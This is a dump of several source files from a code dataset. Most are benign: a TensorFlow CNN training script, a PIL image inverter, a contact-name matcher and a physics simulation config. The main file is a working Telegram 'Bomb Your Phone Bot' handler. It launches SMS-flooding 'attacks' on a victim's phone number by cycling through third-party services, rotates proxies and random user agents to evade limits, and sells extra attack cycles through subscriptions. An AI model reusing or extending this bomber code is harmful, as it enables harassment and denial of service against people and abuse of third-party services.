x_train, y_: y_train}))\n print('pool1: ', sess.run([tf.shape(pool1)], {x: x_train, y_: y_train}))\n print('conv2: ', sess.run([tf.shape(conv2)], {x: x_train, y_: y_train}))\n print('pool2: ', sess.run([tf.shape(pool2)], {x: x_train, y_: y_train}))\n print('flatten: ', sess.run([tf.shape(flatten)], {x: x_train, y_: y_train}))\n print('logits: ', sess.run([tf.shape(logits)], {x: x_train, y_: y_train}))\n\n entropy_on_training = []\n accuracy_on_testing = []\n\n timeRecoder = TimeRecoder()\n timeRecoder.start()\n\n for e in range(no_epochs):\n\n epoch_loss = []\n x_train, y_train = shuffle(x_train, y_train)\n\n # training\n for i in range(len(y_train)//batch_size):\n _, loss_ = sess.run([train_op, entropy], {x: x_train[i*batch_size: (i+1)*batch_size], y_: y_train[i*batch_size: (i+1)*batch_size]})\n epoch_loss.append(loss_)\n \n entropy_on_training.append(sum(epoch_loss)/len(epoch_loss))\n \n # testing\n predict = sess.run([logits], {x: x_test})\n accuracy_on_testing.append(accuracy_score(list(y_test), list(np.argmax(np.array(predict[0]), axis=1))))\n \n \n print('epoch %d: entropy: %f, accuracy: %f' % (e, entropy_on_training[-1], 
accuracy_on_testing[-1]))\n \n timeRecoder.end()\n\n if withDropout:\n\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_entropy_on_training_withDropout.npy'), np.array(entropy_on_training))\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_accuracy_on_testing_withDropout.npy'), np.array(accuracy_on_testing))\n\n #plot\n plt.figure()\n plt.plot(entropy_on_training)\n plt.plot(accuracy_on_testing)\n plt.title('entropy / accuracy')\n plt.xlabel('epoch')\n plt.legend(['entropy_on_training', 'accuracy_on_testing',], loc='upper left')\n plt.savefig(os.path.join(dir_path, 'other', 'figure', 'word_cnn_withDropout.png')) \n\n else:\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_entropy_on_training_withoutDropout.npy'), np.array(entropy_on_training))\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_accuracy_on_testing_withoutDropout.npy'), np.array(accuracy_on_testing))\n\n #plot\n plt.figure()\n plt.plot(entropy_on_training)\n plt.plot(accuracy_on_testing)\n plt.title('entropy / accuracy')\n plt.xlabel('epoch')\n plt.legend(['entropy_on_training', 'accuracy_on_testing',], loc='upper left')\n plt.savefig(os.path.join(dir_path, 'other', 'figure', 'word_cnn_withoutDropout.png')) \n\n\n\n\ndef main():\n print('\\n\\n {} \\n Without Dropout ... \\n {} \\n\\n'.format('-'*40, '-'*40,))\n train(withDropout=False)\n\n tf.reset_default_graph()\n\n print('\\n\\n {} \\n With Dropout ... \\n {} \\n\\n'.format('-'*40, '-'*40,))\n train(withDropout=True)\n\n\nif __name__ == '__main__':\n main()","sub_path":"assignment2/assignment2_question_b/word_cnn.py","file_name":"word_cnn.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"424030231","text":"__author__ = 'dominic'\nfrom PIL import Image\n\n\ndef readImage():\n filename = input(\"Input file name (Including extention)\")\n\n try:\n image = Image.open(filename)\n image.load()\n return image\n except:\n print(\"Unable to load image\")\n return readImage()\n\n\nimage = readImage()\nexpFileName = input(\"Input file name of export)\")\nimExp = Image.new('RGB', image.size)\n\nfor y in range(0, image.size[1]):\n for x in range(0, image.size[0]):\n colour = image.getpixel((x, y))\n colour_ = []\n colour_.append(255 - colour[0])\n colour_.append(255 - colour[1])\n colour_.append(255 - colour[2])\n imExp.putpixel((x, y), (colour_[0], colour_[1], colour_[2]))\nimExp.save(expFileName, 'BMP')","sub_path":"PIL Tests/PILcolourInvert.py","file_name":"PILcolourInvert.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"127764966","text":"import asyncio\r\nimport datetime\r\nimport random\r\nimport sys\r\nimport threading\r\n\r\nimport aiohttp\r\nimport pytz\r\n\r\nfrom aiogram import types, exceptions\r\nfrom aiohttp_socks import ProxyConnector\r\nfrom random_user_agent.params import SoftwareName, OperatingSystem\r\nfrom random_user_agent.user_agent import UserAgent\r\n\r\nimport __main__\r\nfrom handlers import start_message\r\nfrom tools import database, proxy_grabber, misc\r\nfrom tools import tools, config\r\nfrom tools.database import get_user, get_users\r\nfrom tools.misc import dp, thinker, check_bomber, logger, bot\r\n\r\nactive_gays = list()\r\nactive_grabber = False\r\n\r\nif not active_grabber:\r\n active_grabber = True\r\n threading.Thread(target=proxy_grabber.grab, args=(logger, database,\r\n config.proxoid_token)\r\n 
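The pixel-by-pixel loop in the PIL inversion record above can be done in one call with `PIL.ImageOps.invert`, which computes `255 - value` for every channel in optimized C code. A short sketch; the image is built in memory so the example is self-contained, but with a real file it would be `Image.open(path).convert('RGB')`:

```python
from PIL import Image, ImageOps

# Small RGB image built in memory; a placeholder for a loaded file.
image = Image.new('RGB', (4, 4), (10, 20, 30))
inverted = ImageOps.invert(image)  # 255 - value for each channel
print(inverted.getpixel((0, 0)))   # -> (245, 235, 225)
inverted.save('inverted.bmp', 'BMP')
```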
).start()\r\n\r\n\r\nasync def log(meta: dict):\r\n text = (\"NEW ATTACK!\\n\\n\"\r\n f'User Name: {database.get_user(meta[\"from_user\"])[\"full_name\"]}\\n'\r\n f'ID: {meta[\"from_user\"]}\\n'\r\n f'Number: {meta[\"formatted\"]}\\n'\r\n f'Cycles: {meta[\"cycles\"]}\\n'\r\n f'Attack UID: {meta[\"attack_id\"]}\\n'\r\n f'Operator: {meta[\"operator\"]}\\n'\r\n f'Country: {meta[\"country\"]}\\n'\r\n f'Region: {meta[\"region\"]}')\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Забанить\",\r\n callback_data=f\"ban_user {meta['from_user']}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {meta['from_user']}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Остановить',\r\n callback_data=f\"stop_attack {meta['from_user']}\"\r\n )\r\n button4 = types.InlineKeyboardButton(\r\n 'Ссылка',\r\n url=f'tg://resolve?domain={database.get_user(meta[\"from_user\"])[\"user_name\"]}'\r\n )\r\n button5 = types.InlineKeyboardButton(\r\n 'Логи',\r\n callback_data=f\"send_logs {meta['attack_id']}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n\r\n if database.get_user(meta[\"from_user\"])[\"user_name\"] is not None:\r\n kb.row(button3, button4)\r\n kb.row(button5)\r\n\r\n else:\r\n kb.row(button3, button5)\r\n text += f'\\n\\nMention of a user'\r\n\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n\r\n\r\ndef get_user_agent():\r\n software_names = [SoftwareName.CHROME.value, SoftwareName.LYNX.value,\r\n SoftwareName.BLUE_CHROME.value, SoftwareName.EDGE.value,\r\n SoftwareName.INTERNET_EXPLORER.value, SoftwareName.FIREFOX.value,\r\n SoftwareName.SAFARI.value, SoftwareName.YANDEX.value,\r\n SoftwareName.CHROMIUM.value]\r\n operating_systems = [OperatingSystem.WINDOWS.value, OperatingSystem.LINUX.value,\r\n OperatingSystem.ANDROID.value, OperatingSystem.CHROMEOS.value,\r\n OperatingSystem.MAC_OS_X.value, OperatingSystem.MACOS.value,\r\n OperatingSystem.DARWIN.value, OperatingSystem.IOS.value,\r\n OperatingSystem.WINDOWS_PHONE.value]\r\n\r\n user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=100)\r\n\r\n user_agent = user_agent_rotator.get_random_user_agent()\r\n\r\n return user_agent\r\n\r\n\r\ndef get_client(proxy_status: bool):\r\n proxy_string = random.choice(database.get_proxys()) if proxy_status else str()\r\n\r\n agent = get_user_agent()\r\n referer = random.choice(['https://yandex.ru/', 'https://www.google.com/',\r\n 'https://www.bing.com/', 'https://ya.ru/', 'https://mail.ru/',\r\n 'https://www.rambler.ru/', 'https://www.startpage.com/',\r\n 'https://www.qwant.com/?l=en', 'https://duckduckgo.com/',\r\n 'https://www.ecosia.org/', 'https://swisscows.com/',\r\n 'https://www.yahoo.com/', 'https://www.youtube.com/'])\r\n\r\n headers = {\r\n \"User-Agent\": agent,\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"Referer\": referer,\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\"\r\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Connection\": \"keep-alive\",\r\n \"Accept-Language\": \"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\"\r\n }\r\n\r\n return aiohttp.ClientSession(\r\n headers=headers,\r\n connector=ProxyConnector.from_url(f'http://{proxy_string}')\r\n ) if proxy_status else aiohttp.ClientSession(\r\n headers=headers,\r\n connector=aiohttp.TCPConnector(limit=300, ssl=False)\r\n )\r\n\r\n\r\ndef 
generate_attack_message(formatted: str, status: str,\r\n connection: str, uid: str,\r\n cycles: int, country: str,\r\n region: str, operator: str,\r\n send_msg: int, cycles_completed: int,\r\n progressbar: str, attack_start_time: str,\r\n attack_stop_time: str):\r\n return f'Атака на номер {formatted}\\n\\n' \\\r\n f'Статус: {status}\\n' \\\r\n f'Подключение: {connection}\\n' \\\r\n f'UID: {uid}\\n' \\\r\n f'Количество циклов: {cycles}\\n\\n' \\\r\n f'Страна: {country}\\n' \\\r\n f'Регион: {region}\\n' \\\r\n f'Оператор: {operator}\\n\\n' \\\r\n f'Время начала атаки: {attack_start_time}\\n' \\\r\n f'Время окончания атаки: {attack_stop_time}\\n\\n' \\\r\n f'Количество отправленных СМС: {send_msg}\\n' \\\r\n f'Количество пройденных циклов: {cycles_completed}\\n\\n' \\\r\n f'{progressbar}'\r\n\r\n\r\ndef user_logger(attack_id: str, category: str, message: str, newattack: bool = False):\r\n if not newattack:\r\n for message in message.splitlines():\r\n with open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'a', encoding='utf8') as f:\r\n f.write(f'[{tools.get_formatted_time()}] [{category}] {message}\\n')\r\n else:\r\n with open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'w', encoding='utf8') as f:\r\n f.write(f'\\n ██████╗ ██████╗ ███╗ ███╗██████╗ ██╗ ██╗ ██████╗ ██╗ ██╗██████╗ \\n'\r\n f' ██╔══██╗██╔═══██╗████╗ ████║██╔══██╗ ╚██╗ ██╔╝██╔═══██╗██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝██║ ██║██╔████╔██║██████╔╝ ╚████╔╝ ██║ ██║██║ ██║██████╔╝\\n'\r\n f' ██╔══██╗██║ ██║██║╚██╔╝██║██╔══██╗ ╚██╔╝ ██║ ██║██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝╚██████╔╝██║ ╚═╝ ██║██████╔╝ ██║ ╚██████╔╝╚██████╔╝██║ ██║\\n'\r\n f' ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝\\n'\r\n f' ██████╗ ██╗ ██╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ████████╗\\n'\r\n f' ██╔══██╗██║ ██║██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔═══██╗╚══██╔══╝\\n'\r\n f' ██████╔╝███████║██║ ██║██╔██╗ ██║█████╗ ██████╔╝██║ ██║ ██║ \\n'\r\n f' ██╔═══╝ ██╔══██║██║ ██║██║╚██╗██║██╔══╝ ██╔══██╗██║ ██║ ██║ \\n'\r\n f' ██║ ██║ ██║╚██████╔╝██║ ╚████║███████╗ ██████╔╝╚██████╔╝ ██║ \\n'\r\n f' ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ \\n\\n')\r\n\r\n\r\ndef get_attack_stop_time(meta: dict, timeout: int, pause: int, cycles: int):\r\n quantity_services = len(tools.load_services().items())\r\n _time = int((((timeout / 3) + pause) * quantity_services * cycles) / 180)\r\n stop_time_timestamp = int(meta['started']) + (_time * 51)\r\n formatted = datetime.datetime.fromtimestamp(stop_time_timestamp, pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n return '* ' + formatted\r\n\r\n\r\nasync def attack(message: types.Message, meta: dict, from_user: int):\r\n global active_grabber\r\n global active_gays\r\n\r\n await log(meta)\r\n\r\n attack_id = meta['attack_id']\r\n code = meta['code']\r\n number = meta['number']\r\n formatted = meta['formatted']\r\n formatted_title = meta['formatted_title']\r\n cycles = meta['cycles']\r\n operator = meta['operator']\r\n country = meta['country']\r\n region = meta['region']\r\n attack_start_time = datetime.datetime.fromtimestamp(meta['started'], pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n\r\n user_logger(attack_id, str(), str(), True)\r\n\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n\r\n referer = 'Proxoid.net'\r\n\r\n user_dump = database.get_user(from_user)\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 
'Прямое'\r\n pause = user_dump['settings']['pause']\r\n timeout = user_dump['settings']['timeout']\r\n\r\n client = get_client(proxy_status)\r\n\r\n services_completed = 0\r\n sms_send = 0\r\n failed_sms = 0\r\n all_sms = len(tools.load_services().items()) * cycles\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Остановить атаку ⛔',\r\n callback_data=f\"stop_attack {from_user}\"\r\n )\r\n kb.row(button)\r\n\r\n active_gays.append(from_user)\r\n\r\n if len(database.get_proxys()) < config.min_proxys and not active_grabber:\r\n active_grabber = True\r\n threading.Thread(target=proxy_grabber.grab, args=(logger, database,\r\n config.proxoid_token)\r\n ).start()\r\n\r\n # formatted = meta['formatted']\r\n # cycles = meta['cycles']\r\n # operator = meta['operator']\r\n # country = meta['country']\r\n # region = meta['region']\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Initialization...\\n'\r\n f'ATTACK_ID: {attack_id}\\n'\r\n f'PHONE: {formatted}\\n'\r\n f'CYCLES: {cycles}\\n'\r\n f'TIMEOUT: {timeout}s\\n'\r\n f'PAUSE: {pause}s\\n'\r\n f'PHONE_COUNTRY: {country}\\n'\r\n f'PHONE_REGION: {region}\\n'\r\n f'PHONE_OPERATOR: {operator}')\r\n\r\n for cycle in range(1, cycles + 1):\r\n if from_user not in active_gays:\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack stopped by user.')\r\n break\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', f'Cycle {cycle} started!')\r\n for module, service in tools.load_services().items():\r\n services_completed += 1\r\n\r\n if from_user not in active_gays:\r\n break\r\n\r\n if (datetime.datetime.timestamp(datetime.datetime.now()) - latest_edited) >= 15:\r\n try:\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Message updated.')\r\n await message.edit_text(generate_attack_message(formatted_title, 'В работе!',\r\n proxy_status_formatted, attack_id, cycles,\r\n country, region, operator, sms_send, cycle - 1,\r\n progressbar, attack_start_time,\r\n get_attack_stop_time(meta, timeout, pause,\r\n cycles - cycle - 1)),\r\n parse_mode='html', reply_markup=kb, disable_web_page_preview=True)\r\n except exceptions.MessageNotModified:\r\n pass\r\n try:\r\n await asyncio.sleep(pause)\r\n await getattr(module, service)(str(number), str(code), timeout, client).run()\r\n sms_send += 1\r\n user_logger(attack_id, service, f'Sent! ({sms_send}/{failed_sms})')\r\n except (ValueError, AttributeError, Exception):\r\n user_logger(attack_id, service, f'Not sent! 
Caused by {sys.exc_info()[0].__name__} '\r\n f'({sms_send}/{failed_sms})')\r\n failed_sms += 1\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 'Прямое'\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Reconnecting...')\r\n client = get_client(proxy_status)\r\n continue\r\n\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Отправить логи 💾',\r\n callback_data=f\"send_logs {attack_id}\"\r\n )\r\n kb.row(button)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack finished!')\r\n await message.edit_text(generate_attack_message(formatted_title, 'Завершено.', proxy_status_formatted,\r\n attack_id, cycles, country, region, operator,\r\n sms_send, cycles, progressbar, attack_start_time,\r\n tools.get_formatted_time()),\r\n parse_mode='html', reply_markup=kb,\r\n disable_web_page_preview=True)\r\n\r\n if from_user in active_gays:\r\n active_gays.remove(from_user)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('send_logs'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n attack_id = callback_query.data.split(' ', maxsplit=1)[1]\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n document = open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'rb')\r\n await callback_query.answer('Логи отправлены! 
Они придут в течении минуты.', True)\r\n return await bot.send_document(chat_id=callback_query.from_user.id,\r\n document=document)\r\n except (BaseException, Exception):\r\n await callback_query.answer('К сожалению, мы не нашли логи для этой атаки.', True)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('unban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if not database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже лив инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW UNBAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'UnBanned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.unban_user(user)\r\n\r\n try:\r\n misc.gays.remove(user)\r\n except (BaseException, Exception):\r\n pass\r\n\r\n text = f'Вы были разблокированы администратором {dump[\"full_name\"]}.'\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} разбанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('ban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже дед инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW BAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'Banned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Разбанить\",\r\n callback_data=f\"unban_user {user}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {user}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Профиль админа',\r\n callback_data=f\"get_profile {callback_query.from_user.id}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n kb.row(button3)\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.ban_user(user)\r\n\r\n text = f'Вы были заблокированы администратором {dump[\"full_name\"]}. Для ' \\\r\n f'разблокировки, пожалуйста, ' \\\r\n f'обратитесь в тех. поддержку (@{config.support}). 
' \\\r\n f'Ваш персональный код - {user}'\r\n\r\n misc.gays.append(user)\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} забанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('get_profile'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n text = start_message.generate_profile_text(user)\r\n\r\n await bot.send_message(callback_query.from_user.id, text, parse_mode='html')\r\n\r\n try:\r\n return await callback_query.answer(f'Профиль пользователя {user} отправлен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('stop_attack'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n from_user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n active_gays.remove(from_user)\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer('Атака остановлена! Сообщение обновится в течении минуты.', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def text_handler(message: types.Message):\r\n if not await thinker(message):\r\n return\r\n\r\n dump = get_user(message.from_user.id)\r\n checker = check_bomber(message, dump['settings']['default_cycles'])\r\n\r\n trial = not dump['sub_status']\r\n max_cycles = config.trial_cycles_count if trial else config.sub_cycles_count\r\n\r\n if not checker:\r\n text = 'Номер недействителен. ' \\\r\n 'Для получения информации об ' \\\r\n 'использовании бота, пожалуйста, ' \\\r\n 'используйте помощь.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n full_phone = tools.get_full_number(checker['code'], checker['number'])\r\n\r\n if trial and dump['trial_start_count'] < 1:\r\n text = 'К сожалению, ваш пробный период закончился. ' \\\r\n 'Для возобновления доступа к боту, пожалуйста, ' \\\r\n 'перейдите во вкладку \"Донат\" стартового сообщения.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['cycles'] > max_cycles:\r\n text = f'К сожалению, вы не можете использовать ' \\\r\n f'более {max_cycles} циклов. 
Для получения более ' \\\r\n f'подробной информации посетите вкладку \"Профиль\" ' \\\r\n f'стартового сообщения'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if full_phone in get_users()['attached_phone_numbers']:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как его владелец имеет ' \\\r\n f'подписку в нашем боте'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['code'] not in config.available_phone_codes:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как операторы ' \\\r\n f'данной страны не обслуживаются'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if message.from_user.id in active_gays:\r\n text = f'К сожалению, вы не можете запустить спам ' \\\r\n f'на более одного номера одновременно. Пожалуйста, завершите ' \\\r\n f'предыдущую атаку.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n kb.row(types.InlineKeyboardButton(\r\n \"Wait... 🔙\",\r\n callback_data=\"passed\"\r\n ))\r\n\r\n reply_message = await message.reply(generate_attack_message(checker['formatted'], 'Ожидание...', 'Неизвестно',\r\n checker['attack_id'], checker['cycles'],\r\n checker['country'],\r\n checker['region'], checker['operator'], 0, 0,\r\n tools.generate_progressbar(0, 100),\r\n tools.get_formatted_time(), 'Неизвестно'),\r\n parse_mode='html', reply_markup=kb)\r\n\r\n checker['started'] = tools.get_time()\r\n\r\n if trial:\r\n database.minus_attack(message.from_user.id)\r\n\r\n await attack(reply_message, checker, message.from_user.id)\r\n","sub_path":"handlers/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":27621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"10151107","text":"#!/usr/bin/env python3\n\nimport logging\nimport unicodedata\nfrom collections import Counter\n\nfrom pylev3 import Levenshtein\n\n\ndef find_best_match(input_str, tab):\n normalized_input_str = _normalize(input_str)\n normalized_tab = [_normalize(item) for item in tab]\n result = Levenshtein.wfi([item[0: len(normalized_input_str)] for item in normalized_tab], normalized_input_str)\n\n grouped_list = Counter(result)\n distance_between_contacts = max(grouped_list.keys()) - min(grouped_list.keys())\n minimums_count = grouped_list[min(grouped_list.keys())]\n\n if (distance_between_contacts < 4) or (minimums_count > 3):\n raise Exception(\"No Contact named %s found\" % input_str)\n\n else:\n index = result.index(min(result))\n logging.info(\"Contact found %s\" % tab[index])\n return tab[index]\n\n\ndef _normalize(input_str):\n nkfd_form = unicodedata.normalize('NFKD', input_str)\n return (\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])).lower()\n","sub_path":"contact_finder.py","file_name":"contact_finder.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"31435606","text":"import pema\nimport os\nimport straxen\nimport 
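The `_normalize` helper in the contact-finder record above strips accents by NFKD-decomposing the string and dropping combining marks before lowercasing, so `é` compares equal to `e` in the Levenshtein match. A standalone demonstration of the same trick:

```python
import unicodedata


def strip_accents(text: str) -> str:
    # NFKD splits accented characters into base letter + combining mark;
    # dropping the marks leaves the plain ASCII-ish base letters.
    decomposed = unicodedata.normalize('NFKD', text)
    return ''.join(c for c in decomposed
                   if not unicodedata.combining(c)).lower()


print(strip_accents('Éloïse'))           # -> 'eloise'
print(strip_accents('Mönchengladbach'))  # -> 'monchengladbach'
```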
wfsim\n\nname = 'kr'\nbase_dir = '/dali/lgrandi/angevaare/wfsims/pema'\n\n# Fixed\ndata_name = f'pema_w{wfsim.__version__}_p{pema.__version__}'\nfig_dir = os.path.join(base_dir, f'figures_summary_{data_name}')\ndata_dir = os.path.join(base_dir, name, 'processed_data')\nraw_data_dir = os.path.join(base_dir, 'raw_data')\ninstructions_csv = f\"./inst_{data_name}.csv\"\n\n# You need this for setting up the dali-jobs\nenviron_init = '''eval \"$(/home/angevaare/software/Miniconda3/bin/conda shell.bash hook)\"\nconda activate strax\nexport PATH=/home/angevaare/software/Miniconda3/envs/strax/bin:$PATH'''\n\n# Output naming\ndefault_label = 'Normal clustering'\ncustom_label = 'Changed clustering'\n\n# Take a few arbitrary runs that allow to run jobs in parallel and get the \n# gains from CMT\nrun_list = list(f'{r:06}' for r in range(18750, 18750 + 15))\n\n# Just some id which allows CMT to load\nrun_id = run_list[0]\n\n# setting up instructions like this may take a while. You can set e.g. \ninstructions = dict(\n event_rate=5, # Don't make too large -> overlapping truth info\n chunk_size=5, # keep large -> less overhead but takes more RAM\n nchunk=100, # set to 100\n photons_low=1, # PE\n photons_high=100, # PE\n electrons_low=1, #\n electrons_high=100,\n tpc_radius=straxen.tpc_r,\n tpc_length=straxen.tpc_z, # TPC length approx\n drift_field=straxen.get_resource('fax_config_nt_low_field.json', fmt='json').get('drift_field'),\n timing='uniform', # Double S1 peaks uniform over time\n)\n\npema.inst_to_csv(\n instructions,\n instructions_csv,\n get_inst_from=pema.kr83_instructions)\n\nconfig_update = dict(\n detector='XENONnT',\n fax_file=os.path.abspath(instructions_csv),\n fax_config='fax_config_nt_low_field.json',\n)\n","sub_path":"notebooks/setup_kr.py","file_name":"setup_kr.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"46739778","text":"from fastapi import FastAPI\nfrom 